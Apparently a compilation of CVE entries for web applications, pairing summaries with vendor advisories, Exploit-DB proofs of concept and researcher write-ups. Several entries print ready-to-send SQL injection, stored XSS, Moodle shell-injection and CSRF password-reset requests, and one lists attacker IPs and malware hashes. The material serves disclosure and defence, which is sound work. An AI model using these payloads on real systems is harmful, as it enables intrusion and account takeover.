A vulnerability in the user profile update component found in the ~/src/Classes/EditUserProfile.php file of the ProfilePress WordPress plugin made it possible for users to escalate their privileges to that of an administrator while editing their profile. This issue affects versions 3.0.0 - 3.1.3. .

On May 27, 2021, the Wordfence Threat Intelligence team initiated the responsible disclosure process for several vulnerabilities that were discovered in ProfilePress, formerly WP User Avatar, a WordPress plugin installed on over 400,000 sites. These flaws made it possible for an attacker to upload arbitrary files to a vulnerable site and register as an administrator on sites even if user registration was disabled, all without requiring any prior authentication.

We initially reached out to the plugin’s developer on May 27, 2021. After receiving confirmation of an appropriate communication channel, we provided the full disclosure details the same day. An updated copy of the plugin was sent to our team on May 28, 2021, which we confirmed provided sufficient protection. The patch was quickly released on May 30, 2021 as version 3.1.4.

These are critical and easily exploitable security issues that have been patched, therefore, we highly recommend updating to the latest patched version available, 3.1.8, immediately if you are running a vulnerable version of this plugin (3.0- 3.1.3).

Wordfence Premium users received a firewall rule to protect against any exploits targeting these vulnerabilities on May 27, 2021. Sites still using the free version of Wordfence received the same protection on June 26, 2021.

_We waited 30 days before disclosing these issues to ensure both Wordfence Premium and free users were protected against any exploit attempts given the severity of the issues and size of the installation base. We have also intentionally minimized the details provided on how these vulnerabilities could be exploited to delay any efforts by malicious threat actors._

**Description:** Unauthenticated Privilege Escalation  
**Affected Plugin:** User Registration, User Profiles, Login & Membership – ProfilePress (Formerly WP User Avatar)  
**Plugin Slug:** wp-user-avatar  
**Affected Versions:** 3.0 – 3.1.3  
**CVE ID:** CVE-2021-34621  
**CVSS Score:** 9.8 (CRITICAL)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Chloe Chamberland  
**Fully Patched Version:** 3.1.4

ProfilePress, formerly known as WP User Avatar, is a WordPress plugin that was originally designed to be used only to upload user profile photos. Recently, however, the plugin underwent a somewhat controversial revamp. The updated plugin introduced new features like user login and registration, while keeping the original profile photo uploading functionality, in order to create a robust user registration plugin. Unfortunately, the new features introduced several security issues.

The first issue discovered allowed users to escalate their privileges, which could lead to site takeover. During user registration, users could supply arbitrary user meta data that would get updated during the registration process. This included the wp_capabilities user meta that controls a user’s capabilities and role. This made it possible for a user to supply wp_capabilties as an array parameter while registering, which would grant them the supplied capabilities, allowing them to set their role to any role they wanted, including administrator.

       if (is\_array($custom\_usermeta)) {

            foreach ($custom\_usermeta as $key => $value) {
                if ( ! empty($value)) {
                    update\_user\_meta($user\_id, $key, $value);
                    // the 'edit\_profile' parameter is used to distinguish it from same action hook in RegistrationAuth
                    do\_action('ppress\_after\_custom\_field\_update', $key, $value, $user\_id, 'registration');
                }
            }
        }

In addition, there was no check to validate that user registration was enabled on the site, making it possible for users to register as an administrator even on sites where user registration was disabled. This meant that attackers could completely take over a vulnerable WordPress site without much effort if a vulnerable version of this plugin was in use.

**Description:** Authenticated Privilege Escalation  
**Affected Plugin:** User Registration, User Profiles, Login & Membership – ProfilePress (Formerly WP User Avatar)  
**Plugin Slug:** wp-user-avatar  
**Affected Versions:** 3.0 – 3.1.3  
**CVE ID:** CVE-2021-34622  
**CVSS Score:** 9.8 (CRITICAL)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Chloe Chamberland  
**Fully Patched Version:** 3.1.4

The same flaw was present within the user profile update functionality. The profile update functionality had the same feature that would take the key value pairs submitted during a profile update and update the user’s metadata in the database. The wp_capabilities user meta could be supplied as an array parameter set to administrator during a profile update which would allow attackers to escalate their privileges to that of an administrator.

      if (is\_array($custom\_usermeta)) {

            $user\_id = self::get\_current\_user\_id();

            foreach ($custom\_usermeta as $key => $value) {

                update\_user\_meta($user\_id, $key, $value);

                // the 'edit\_profile' parameter is used to distinguish it from same action hook in RegistrationAuth
                do\_action('ppress\_after\_custom\_field\_update', $key, $value, $user\_id, 'edit\_profile');
            }
        }

This did require the attacker to have an account on a vulnerable site to exploit. However, since the registration function did not validate if user registration was enabled, a user could easily sign up and exploit this vulnerability, if they were not able to exploit the privilege escalation vulnerability during registration.

**Description:** Arbitrary File Upload in Image Uploader Component  
**Affected Plugin:** User Registration, User Profiles, Login & Membership – ProfilePress (Formerly WP User Avatar)  
**Plugin Slug:** wp-user-avatar  
**Affected Versions:** 3.0 – 3.1.3  
**CVE ID:** CVE-2021-34623  
**CVSS Score:** 9.8 (CRITICAL)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Chloe Chamberland  
**Fully Patched Version:** 3.1.4

In addition to the privilege escalation vulnerabilities, we found that arbitrary files, including PHP files, could be uploaded to a vulnerable WordPress site. The ability to upload profile and cover images to a user’s profile is a core part of the plugin’s functionality. Unfortunately, this function was insecurely implemented using the exif_imagetype function to determine a file’s type.

             // verify the file is a GIF, JPEG, or PNG
            $fileType = exif\_imagetype($image\["tmp\_name"\]);

            $allowed\_image\_type = apply\_filters('ppress\_allowed\_image\_type', array(
                IMAGETYPE\_GIF,
                IMAGETYPE\_JPEG,
                IMAGETYPE\_PNG
            ));

The function exif_imagetype uses the first few bytes of a file, known as magic bytes, to determine a file’s type, and as such is considered an unsafe method to validate a file’s type. Any file can trivially be disguised to appear as a valid image file by adding these magic bytes to the beginning of the file. This made it possible for an attacker to upload a spoofed PHP file that would pass the exif_imagetype check during the user registration process or during a profile update.

This could be used to upload a webshell that would make it possible for an attacker to achieve remote code execution and run commands on a server to achieve complete site takeover. Due to the fact that users could register even without user registration enabled, any attacker could exploit this vulnerability without authentication by uploading a profile picture or cover image during a registration request.

**Description:** Arbitrary File Upload in File Uploader Component  
**Affected Plugin:** User Registration, User Profiles, Login & Membership – ProfilePress (Formerly WP User Avatar)  
**Plugin Slug:** wp-user-avatar  
**Affected Versions:** 3.0- 3.1.3  
**CVE ID:** CVE-2021-34624  
**CVSS Score:** 9.8 (CRITICAL)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Chloe Chamberland  
**Fully Patched Version:** 3.1.4

In addition to the previous arbitrary file upload vulnerability, we discovered that another endpoint was also vulnerable to arbitrary file uploads. It appears that there was functionality in the plugin to upload files to a user’s profile account during user registration or during a profile update if a site was using the plugin’s “custom fields” extension.

This function performed a file extension check only if a set of extensions was supplied by a site administrator via a custom field on the registration and profile update page. This meant that if a site administrator didn’t configure file uploads for the user registration and profile page using custom fields, then any file type would be allowed due to the extensions field being empty.

This made it possible for attackers to upload arbitrary files to a site during the user registration process or during a profile update, as long as an administrator didn’t configure the file upload settings. Again, this could be used to upload a webshell and obtain remote code execution to take over a site.

**Disclosure Timeline**

**May 27, 2021** – Conclusion of the plugin analysis that led to the discovery of several vulnerabilities in the ProfilePress plugin. We develop a firewall rule to protect Wordfence customers and release it to Wordfence Premium users.  
**May 27, 2021 6:27 PM UTC** – We initiate contact with the plugin developer.  
**May 27, 2021 6:52 PM UTC** – The plugin developer confirms the inbox for handling discussion.  
**May 27, 2021 9:23 PM UTC** – We send over full disclosure details.  
**May 27, 2021 9:27 PM UTC** – The plugin developer confirms they have received the details and will begin working on a fix.  
**May 28, 2021 7:16 AM UTC** – The plugin developer sends us a copy of the proposed patches.  
**May 28, 2021 12:48 PM UTC** – We inform the developer that we will review the patches and get back to them as soon as our analysis is complete.  
**May 28, 2021 3:44 PM UTC** – We confirm the patches are sufficient and inform the developer.  
**May 30, 2021** – A newly updated version of the plugin containing the patches is released.  
**June 26, 2021** – Free Wordfence users receive firewall rules.

**Conclusion**

In today’s post, we detailed several critical flaws in ProfilePress that granted attackers the ability to upload malicious files to achieve remote code execution in addition to registering as an administrator. These flaws have been fully patched in version 3.1.4. We recommend that users immediately update to the latest version available, which is version 3.1.8 at the time of this publication, if they are running a vulnerable version of the plugin (3.0 – 3.1.3).

Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on May 27, 2021. Sites still using the free version of Wordfence received the same protection on June 26, 2021.

If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as these are critical severity vulnerabilities that can be easily exploited.

_Special thanks to Collins at ProfilePress for working quickly to get a sufficient patch out to protect users._

CVE-2021-34622: Easily Exploitable Critical Vulnerabilities Patched in ProfilePress Plugin

Multiple SQL Injection vulnerabilities in Teachers Record Management System 1.0 allow remote authenticated users to execute arbitrary SQL commands via the 'editid' GET parameter in edit-subjects-detail.php, edit-teacher-detail.php, or the 'searchdata' POST parameter in search.php.

    # Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
    # Date: 05-10-2021
    # Exploit Author: nhattruong
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
    # Version: 1.0
    # Tested on: Windows 10 + XAMPP v3.2.4
    
    POC:
    1. Go to url http://localhost/login.php
    2. Login with default creds
    3. Execute the payload
    
    Payload #1:
    
    POST /admin/search.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/trms/admin/search.php
    Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
    Upgrade-Insecure-Requests: 1
    
    searchdata=a' or 1=1-- -&search=
    
    Payload #2:
    
    http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -
    
    Payload #3:
    
    http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -

CVE-2021-28423: OffSec’s Exploit Database Archive

A stored cross-site scripting (XSS) vulnerability in Teachers Record Management System 1.0 allows remote authenticated users to inject arbitrary web script or HTML via the 'email' POST parameter in adminprofile.php.

    # Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
    # Date: 05-10-2021
    # Exploit Author: nhattruong
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
    # Version: 1.0
    # Tested on: Windows 10 + XAMPP v3.2.4
    
    POC:
    1. Go to url http://localhost/admin/index.php
    2. Do login
    3. Execute the payload
    4. Reload page to see the different
    
    Payload:
    
    POST /admin/adminprofile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 91
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/trms/admin/adminprofile.php
    Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
    Upgrade-Insecure-Requests: 1
    
    adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=

CVE-2021-28424: OffSec’s Exploit Database Archive

Shopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommend to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.

@@ -50,10 +50,7 @@ public function preDispatch()

$this\->enableBackendTheme();

}

  

if (strpos($this\->Request()->getHeader('Content-Type'), 'application/json') === 0) {

$this\->Front()->Plugins()->Json()->setRenderer();

$this\->View()->assign('success', false);

} elseif ($this\->Request()->isXmlHttpRequest() || !Shopware()->Container()->initialized('db')) {

if ($this\->Request()->isXmlHttpRequest() || !Shopware()->Container()->initialized('db')) {

$this\->View()->loadTemplate($templateModule . '/error/exception.tpl');

} elseif (isset($\_ENV\['SHELL'\]) || PHP\_SAPI === 'cli') {

$this\->View()->loadTemplate($templateModule . '/error/cli.tpl');

CVE-2021-32712: SW-26001 - Adjust error controller · shopware/shopware@dcb24eb

phpwcms 1.9.13 is vulnerable to Code Injection via /phpwcms/setup/setup.php.

**Test version**

VERSION 1.9.13, RELEASE 2020/01/10

**Code audit****setup.php code**

Open the secure boot file setup.php,the file path is /phpwcms/setup/setup.php.Then it  
include /phpwcms/setup/inc/setup.check.inc.php in line 24.

**setup.check.inc.php code**

open file /phpwcms/setup/inc/setup.check.inc.php and you can see line 35.

**setup.func.inc.php code**

tarck the function write\_conf\_file() in /phpwcms/setup/inc/setup.func.inc.php in line 119.

and in line 293,it will call function write\_textfile() to write the config file in line 35.

**Testing getshell**

in this interface,you can input some infomation like this.

**payload**

After completing it, click Submit.It will show some error information,but you can access like this address and you can see it run the injection code.

**Solution**

Filtering some sensitive characters.

CVE-2020-21784: Code Injection Vulnerability can Getshell · Issue #286 · slackero/phpwcms

A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities.

**Summary**

A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities.

**Tested Versions**

Moodle 3.10

**Product URLs**

https://moodle.org/

**CVSSv3 Score**

8.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

Moodle is a popular free and open-source learning management system, used by 262 million education users around the world.

Moodle’s security model relies on operating system permissions to prevent arbitrary server-side command execution via the web interface. A typical Moodle installation runs as the web server’s user and according to Moodle’s documentation “It is vital that the \[Moodle\] files are not writeable by the web server user.” If they are, an administrator can gain code execution trivially by installing plugins through the web interface. Moodle administrators can also specify paths to system binaries, as well as upload files to the Moodle data directory (outside of the web root) via course restoration; arbitrary code execution is prevented only because uploaded files do not have the execute bit set.

To exploit the shell injection vulnerability, the administrator sets a path to the legacy server-side spellcheck binary (aspellpath) containing a backtick shell injection and sets PSpellShell as the spellchecking engine. When a server-side spellcheck is requested, lib/editor/tinymce/plugins/spellchecker/classes/PSpellShell.php uses aspellpath to unsafely construct a shell\_exec command. The spellchecker plugin does not have to be enabled.

Reproduction

1.  Set aspellpath. This payload assumes that the Moodle data directory is /var/www/moodledata.
    
          POST /moodle/admin/settings.php?section=systempaths HTTP/1.1
          Host: moodle.example.com
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          Referer: https://moodle.example.com/moodle/admin/settings.php?section=systempaths
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 220
          Origin: https://moodle.example.com
          Connection: close
          Cookie: MoodleSession=XXXXXXXXXXXXXXXXXXXXXXXXXX
          Upgrade-Insecure-Requests: 1
        
          section=systempaths&action=save-settings&sesskey=XXXXXXXXXX&return=&s__pathtophp=&s__pathtodu=&s__aspellpath=%60%2Fusr%2Fbin%2Fid+%3E+%2Fvar%2Fwww%2Fmoodledata%2Fpoc%60&s__pathtodot=&s__pathtogs=%2Fusr%2Fbin%2Fgs&s__pathtopython=
        
    
2.  Set the spell engine to PSpellShell.
    
         POST /moodle/admin/settings.php?section=tinymcespellcheckersettings HTTP/1.1
         Host: moodle.example.com
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         Referer: https://moodle.example.com/moodle/admin/settings.php?section=tinymcespellcheckersettings
         Content-Type: application/x-www-form-urlencoded
         Content-Length: 334
         Origin: https://moodle.example.com
         Connection: close
         Cookie: MoodleSession=XXXXXXXXXXXXXXXXXXXXXXXXXX
         Upgrade-Insecure-Requests: 1
            
         section=tinymcespellcheckersettings&action=save-settings&sesskey=XXXXXXXXXX&return=&s_tinymce_spellchecker_spellengine=PSpellShell&s_tinymce_spellchecker_spelllanguagelist=%2BEnglish%3Den%2CDanish%3Dda%2CDutch%3Dnl%2CFinnish%3Dfi%2CFrench%3Dfr%2CGerman%3Dde%2CItalian%3Dit%2CPolish%3Dpl%2CPortuguese%3Dpt%2CSpanish%3Des%2CSwedish%3Dsv
        
    
3.  Invoke the spellcheck using either checkWords or getSuggestions. This step can be performed unauthenticated.
    
         POST /moodle/lib/editor/tinymce/plugins/spellchecker/rpc.php HTTP/1.1
         Host: moodle.example.com
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
         Accept: */*
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         Content-Type: application/json
         X-Requested-With: XMLHttpRequest
         Content-Length: 57
         Origin: https://moodle.example.com
         Connection: close
            
         {"id":"c0","method":"checkWords","params":["en",["teh"]]}
        
    

Results:

    root@moodle:~# cat /var/www/moodledata/poc
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

**Timeline**

2021-03-26 - Vendor Disclosure  
2021-04-21 - Vendor updated documentation to suggest best practices after installation  
2021-06-22 - Public Release

Discovered by Adam Reiser of Cisco ASIG.

CVE-2021-21809: TALOS-2021-1277 || Cisco Talos Intelligence Group

PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\check_availability.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.

CVE-2020-22164: GitHub - itodaro/PHPGurukul_Hospital_Management_System4.0_cve

Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component "JuQingCMS_v1.0/admin/index.php?c=administrator&a=add".

CVE-2020-18648

The Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.

_Update: A patched version of Fancy Product Designer, 4.6.9, is now available as of June 2, 2021. This article has been updated to reflect newly available information, including Indicators of Compromise._

On May 31, 2021, the Wordfence Threat Intelligence team discovered a critical file upload vulnerability being actively exploited in Fancy Product Designer, a WordPress plugin installed on over 17,000 sites.

We initiated contact with the plugin’s developer the same day and received a response within 24 hours. We sent over the full disclosure the same day we received a response, on June 1, 2021. Due to this vulnerability being actively attacked, we are publicly disclosing with minimal details until users have time to update to the patched version in order to alert the community to take precautions to keep their sites protected.

While the Wordfence Firewall’s built-in file upload protection sufficiently blocks the majority of attacks against this vulnerability, we determined that a bypass was possible in some configurations. As such, we released a new firewall rule to our premium customers on May 31, 2021. Sites still running the free version of Wordfence will receive the rule after 30 days, on June 30, 2021.

As this is a Critical 0-day under active attack and is exploitable in some configurations even if the plugin has been deactivated, we urge anyone using this plugin to update to the latest version available, 4.6.9, immediately.

**Description:** Unauthenticated Arbitrary File Upload and Remote Code Execution  
**Affected Plugin:** Fancy Product Designer  
**Plugin Slug:** fancy-product-designer  
**Affected Versions:** < 4.6.9  
**CVE ID:** CVE-2021-24370  
**CVSS Score:** 9.8 (Critical)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Charles Sweethill/Ram Gall  
**Fully Patched Version:** 4.6.9

Fancy Product Designer is a WordPress plugin that offers the ability for customers to upload images and PDF files to be added to products. Unfortunately, while the plugin had some checks in place to prevent malicious files from being uploaded, these checks were insufficient and could easily be bypassed, allowing attackers to upload executable PHP files to any site with the plugin installed. This effectively made it possible for any attacker to achieve Remote Code Execution on an impacted site, allowing full site takeover.

We will provide a more detailed technical explanation of the vulnerability once more users have updated to a patched version.

**How do I update?**

In most cases you will need to login to codecanyon.net. Once you are logged in, you should be able to visit the product page at https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393. In the Overview sidebar on the right-hand side of the product page you should see a Download link:

Once you have downloaded the patched version of the plugin, you should be able to login to your WordPress site and go to Plugins->Add New->Upload Plugin to upload the patched plugin.

**Indicators of Compromise**

In most cases a successful attack results in a number of files which will appear in a subfolder of either  
wp-admin  
or  
wp-content/plugins/fancy-product-designer/inc  
with the date the file was uploaded. For instance:

wp-content/plugins/fancy-product-designer/inc/2021/05/30/4fa00001c720b30102987d980e62d5e4.php

or

wp-admin/2021/05/31/4fa00001c720b30102987d980e62d5e4.php

_Update – the filenames in question are deterministic and we have added filenames associated with this vulnerability._  
The following filenames and MD5 hashes are associated with this attack:

ass.php – MD5 3783701c82396cc96d842839a291e813. This is the initial payload, a dropper that then retrieves additional malware from a 3rd party site.  
op.php – MD5 29da9e97d5efe5c9a8680c7066bb2840. A password-protected Webshell.  
prosettings.php – MD5 e6b9197ecdc61125a4e502a5af7cecae. A Webshell found in older infections.  
4fa00001c720b30102987d980e62d5e4.php – MD5 4329689c76ccddd1d2f4ee7fef3dab71. This payload decodes and loads a separate Webshell.  
4fa00001c720b30002987d983e62d5e1.jpg – MD5 c8757b55fc7d456a7a1a1aa024398471. The compressed webshell loaded by 4fa00001c720b30102987d980e62d5e4.php. Cannot be executed without the loader script.

The majority of attacks against this vulnerability are coming from the following IP addresses:

69.12.71.82  
92.53.124.123  
46.53.253.152

This attacker appears to be targeting e-commerce sites and attempting to extract order information from site databases. As this order information contains personally identifiable information from customers, site owners are in a particularly difficult position if they are still running vulnerable versions of this plugin as it risks the e-commerce merchant’s PCI-DSS compliance.

Our research indicates that this vulnerability is likely not being attacked on a large scale but has been exploited since at least May 16, 2021. _Update: Our Threat Intelligence Team has now found evidence of this vulnerability being exploited as early as January 30, 2021._

**Timeline**

**May 31, 2021** 15:05 UTC – Wordfence Security Analyst Charles Sweethill finds evidence of a previously unknown vulnerability during malware removal and forensic investigation as part of a site cleaning and begins investigating possible attack vectors.  
**May 31, 2021** 15:45 UTC – Charles notifies the Wordfence Threat Intelligence team and a full investigation begins.  
**May 31, 2021** 16:20 UTC – We develop an initial proof of concept and begin work on a firewall rule.  
**May 31, 2021** 17:06 UTC – We initiate contact with the plugin developer.  
**May 31, 2021** 18:59 UTC – We release the firewall rule protecting against this vulnerability to Wordfence Premium customers.  
**June 1, 2021** 09:03 UTC – The plugin developer responds to our initial contact.  
**June 1, 2021** 13:35 UTC – We send over full disclosure.  
**June 2, 2021** – The plugin developer releases a patched version, 4.6.9, of the plugin.  
**June 30, 2021** – Firewall rule becomes available to free Wordfence users.

**Conclusion**

In today’s article, we covered a critical 0-day vulnerability in Fancy Product Designer that is being actively attacked and used to upload malware onto sites that have the plugin installed.

While Wordfence Premium users should be protected against this vulnerability, we urge any users of this plugin to update to the latest version of the plugin, 4.6.9, immediately, as it is possible in some configurations to exploit the vulnerability even if the plugin is deactivated.

We will continue to monitor the situation and follow up as more information becomes available.

_Special Thanks to Wordfence Security Analyst Charles Sweethill for discovering the vulnerability, determining the most likely vectors and indicators of compromise, and testing the firewall rule during a holiday. We also wanted to extend kudos the the plugin developer, radykal for quickly developing a patch for this issue._

CVE-2021-24370: Critical 0-day in Fancy Product Designer Under Active Attack

White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php, remote attackers can exploit the vulnerability to create a task.

###White Shark System(wss) Multiple Vulnerability

####General description：

White Shark System(wss) is a browser-based collaborative office platform that integrates "project management", "task management", "work management" and "work log management".

**\[1\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the control\_task.php, control\_project.php, default\_user.php files failing to filter the sort parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[2\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the default\_task\_edituser.php files failing to filter the csa\_to\_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[3\]White Shark System(wss) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the log\_edit.php files failing to filter the csa\_to\_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.**

**\[4\]White Shark System(wss) 1.3.2 has an unauthorized access vulnerability,remote attackers can modify the password of any user.**

**\[5\]White Shark System(wss) 1.3.2 has a cross-site request forgery vulnerability,remote attackers can use the user\_edit\_password.php file to modify the user password.**

**\[6\]White Shark System(wss) 1.3.2 has an unauthorized access vulnerability,remote attackers can exploit this vulnerability to escalate to admin privileges.**

**\[7\]White Shark System(wss) 1.3.2 has a sensitive information disclosure vulnerability,remote attackers can obtain username information for all users of the current site.**

**\[8\]White Shark System(wss) 1.3.2 has a sensitive information disclosure vulnerability,remote attackers can exploit the vulnerability to create a task.**

**\[9\]White Shark System(wss) 1.3.2 has web site physical path leakage vulnerability.**

\*\*Environment: \*\* apache/php 7.0.12/White Shark System(wss) 1.3.2

**\[1\]SQL Injection Vulnerability**

The vulnerable file is control\_task.php. (control\_project.php, default\_user.php)

In the control\_task.php file:

On line 150, if the user submits the sort parameter, it is assigned to $sortlist.

On line 284, the GetSQLValueString function is called to process $sortlist and assign it to $query_Recordset1.

 In the GetSQLValueString function of function.class.php, when theType is defined, it will return the value without processing.

Go back to the control\_task.php file:  Line 289 data directly enters the database query,the injection vulnerability was caused by not filtering the data.

Request the following url:/index.php?sort=1,extractvalue(rand(),concat(0x3a,substring(user(),1,30)))%23 

The current user is obtained by injection as root@localhost.

**\[2\]SQL Injection Vulnerability**

The vulnerable file is default\_task\_edituser.php.

The system can filter requests by default only after calling the GetSQLValueString function.

In the default\_task\_edituser.php file:

Line 5 restricts the user to one of "Guest" / "Ordinary User" / "Project Manager" / "Administrator".

Line 20 directly puts $_POST['csa_to_user'] into the database for query, resulting in injection.

Initiate a POST request to submit the following data:

    POST /default_task_edituser.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 79
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/default_user_edit.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=19
    
    csa_to_user=1' and 1=(updatexml(1,concat(0x5e24,(select @@version),0x5e24),1))#
    

The current database version obtained by injection is 5.5.53:

**\[3\]SQL Injection Vulnerability**

The vulnerable file is log\_edit.php.

In log\_edit.php:

Line 5 restricts the user to one of "Guest" / "Ordinary User" / "Project Manager" / "Administrator".

On line 58, $logdate enters the database query without being processed by the GetSQLValueString function, resulting in injection.

Request the following url: /log_edit.php?date=1234/**/and/**/1=(updatexml(1,concat(0x5e24,(select%20@@version),0x5e24),1))--%20-&taskid= 1

The current database version obtained by injection is 5.5.53.

**\[4\]Unauthorized Access Vulnerability**

In user\_edit\_password.php:

On line 24, the password is modified for the specified user by $_POST['ID'] and the original password is not verified. So you can override the password of someone else.

After logging in, send the following data:

    POST /user_edit_password.php HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 69
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Referer: http://127.0.0.1:8002/user_edit_password.php?UID=2
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: PHPSESSID=dob1mc5scckdktqjp6bif5dh64; csd=21
    
    tk_user_pass=a121314156&tk_user_pass2=a121314156&MM_update=form1&ID=1
    

The admin's password will be modified to a121314156.

**\[5\]CSRF Vulnerability**

Save the following as change.html:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://127.0.0.1:8002/user_edit_password.php?UID=1" method="POST">
          <input type="hidden" name="tk_user_pass" value="a1111111" />
          <input type="hidden" name="tk_user_pass2" value="a1111111" />
          <input type="hidden" name="MM_update" value="form1" />
          <input type="hidden" name="ID" value="1" />
        </form>
    	<script>document.forms[0].submit();</script>
      </body>
    </html>
    

After the admin accesses the page, the admin's password will be modified to a1111111. If you want to modify someone else's password, modify the corresponding UID parameter.

**\[6\]Unauthorized Access Vulnerability**

In default\_user\_edit.php

Line 23 If the queried user uid does not match the current id or is not an admin, the operation is quit, and the user is prohibited from viewing other user details.

However, when the user's data update is performed on line 58, the user uid of the data to be updated is directly obtained from $_POST['ID'], so that the information of others can be modified.

POST requests the following data:

    POST /default_user_edit.php?UID=2 HTTP/1.1
    Host: 127.0.0.1:8002
    Connection: keep-alive
    Content-Length: 179
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://127.0.0.1:8002
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4295.400 QQBrowser/9.7.12661.400
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
